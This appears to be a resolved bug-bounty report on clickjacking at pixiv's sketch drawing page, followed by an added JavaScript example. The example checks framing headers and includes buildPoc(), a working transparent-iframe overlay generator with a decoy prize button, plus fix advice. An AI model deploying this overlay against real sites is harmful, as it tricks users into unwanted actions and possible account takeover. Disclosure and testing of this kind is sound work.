Clickjacking can lead to account takeover
Low
Vulnerability Details
Hello team.
While testing the site, we found an endpoint called https://sketch.pixiv.net/draw
{F2626044}
Using it, we can trick the user into a fake login with the use of clickjackingpoc: https://github.com/shifa123/clickjackingpoc
As shown in the PoC:
{F2626057}
## Impact
Users are tricked into performing all sorts of unintended actions, such as typing in the password, clicking on the 'Delete my account' button, liking a post, deleting a post, or commenting on a blog. In other words, all the actions that a normal user can do on a legitimate website can be done using clickjacking.
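The two checks a tester runs around a finding like this, as an added example that is not code from the report, from pixiv, or from the linked clickjackingpoc tool: `isFrameable()` decides from a target's response headers whether a page on an attacker-controlled origin may embed it in an iframe (CSP `frame-ancestors` takes precedence over `X-Frame-Options`; `DENY`/`SAMEORIGIN` block cross-origin framing; the obsolete `ALLOW-FROM` and other unrecognised values are ignored by current browsers), and `buildPoc()` emits the transparent-overlay page that the PoC relies on. The attacker origin `https://attacker.example`, the default target origin, and every header set below are constructed for illustration.

```javascript
// Added example, not code from the HackerOne report or the linked clickjackingpoc tool.
// isFrameable(headers): may a page on ATTACKER_ORIGIN load the target in an <iframe>?
// buildPoc(targetUrl):  the classic transparent-overlay clickjacking PoC page.
// ATTACKER_ORIGIN, TARGET_ORIGIN and the SAMPLE_RESPONSES below are constructed.

const ATTACKER_ORIGIN = "https://attacker.example";
const TARGET_ORIGIN = "https://sketch.pixiv.net";

// Does one CSP frame-ancestors source expression permit `origin` to frame the target?
// Handles 'none', 'self', '*', explicit origins/hosts and "*.example.com" host wildcards;
// anything more exotic is treated as not matching (conservative for the defender).
function sourceAllows(src, origin, targetOrigin) {
  const s = src.toLowerCase();
  if (s === "'none'") return false;
  if (s === "*") return true;
  if (s === "'self'") return origin === targetOrigin;
  const host = new URL(origin).host;
  const plain = s.replace(/^[a-z]+:\/\//, "").replace(/\/.*$/, ""); // strip scheme and path
  if (plain.startsWith("*.")) return host.endsWith(plain.slice(1)) && host !== plain.slice(2);
  return plain === host || s === origin;
}

// Returns { frameable, reason } for a plain object of response headers (any case).
function isFrameable(headers, origin = ATTACKER_ORIGIN, targetOrigin = TARGET_ORIGIN) {
  const h = {};
  for (const [k, v] of Object.entries(headers)) h[k.toLowerCase()] = v; // names are case-insensitive
  const csp = h["content-security-policy"] || "";
  const fa = csp.split(";").map(d => d.trim()).find(d => /^frame-ancestors\b/i.test(d));
  if (fa) {
    // frame-ancestors wins: browsers ignore X-Frame-Options when it is present.
    // An empty source list allows nothing.
    const sources = fa.split(/\s+/).slice(1);
    const allowed = sources.length > 0 && sources.some(src => sourceAllows(src, origin, targetOrigin));
    return { frameable: allowed, reason: `CSP ${fa}` };
  }
  const xfo = (h["x-frame-options"] || "").trim().toUpperCase();
  if (xfo === "DENY") return { frameable: false, reason: "X-Frame-Options: DENY" };
  if (xfo === "SAMEORIGIN") return { frameable: origin === targetOrigin, reason: "X-Frame-Options: SAMEORIGIN" };
  if (xfo) return { frameable: true, reason: `X-Frame-Options: ${xfo} is not DENY/SAMEORIGIN (ALLOW-FROM is obsolete) and is ignored` };
  return { frameable: true, reason: "no X-Frame-Options and no CSP frame-ancestors" };
}

// Overlay PoC: a visible decoy button with the target page framed on top of it at (near) zero
// opacity, so the victim's click lands on the framed page's control instead of the decoy.
// Use opacity ~0.3 while aligning the decoy under the real control, then 0 for the demo.
function buildPoc(targetUrl, { opacity = 0, decoyText = "Click to claim your prize", top = 0, left = 0 } = {}) {
  const safeUrl = String(targetUrl).replace(/"/g, "&quot;");
  return `<!doctype html>
<html><head><meta charset="utf-8"><title>Clickjacking PoC</title>
<style>
  #decoy  { position:absolute; top:${top}px; left:${left}px; z-index:1; font-size:20px; }
  #target { position:absolute; top:0; left:0; width:1200px; height:900px; z-index:2; opacity:${opacity}; border:0; }
</style></head>
<body>
  <button id="decoy">${decoyText}</button>
  <iframe id="target" src="${safeUrl}"></iframe>
</body></html>`;
}

// Constructed header sets standing in for three possible responses from the target.
const SAMPLE_RESPONSES = {
  unprotected: { "Content-Type": "text/html" },
  xfo_deny: { "X-Frame-Options": "DENY" },
  csp_self: { "Content-Security-Policy": "default-src 'self'; frame-ancestors 'self'" },
};

for (const [name, headers] of Object.entries(SAMPLE_RESPONSES)) {
  const verdict = isFrameable(headers);
  console.log(`${name}: frameable=${verdict.frameable} (${verdict.reason})`);
}
```

Run the header check against the real response before building the PoC; the overlay only demonstrates anything when `isFrameable()` reports `true`. The fix on the server side is the `csp_self` shape above (`frame-ancestors 'self'` or `'none'`), with `X-Frame-Options: DENY` kept as a fallback for older clients.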
Report Stats
- Report ID: 2119892
- State: Closed
- Substate: resolved
- Upvotes: 54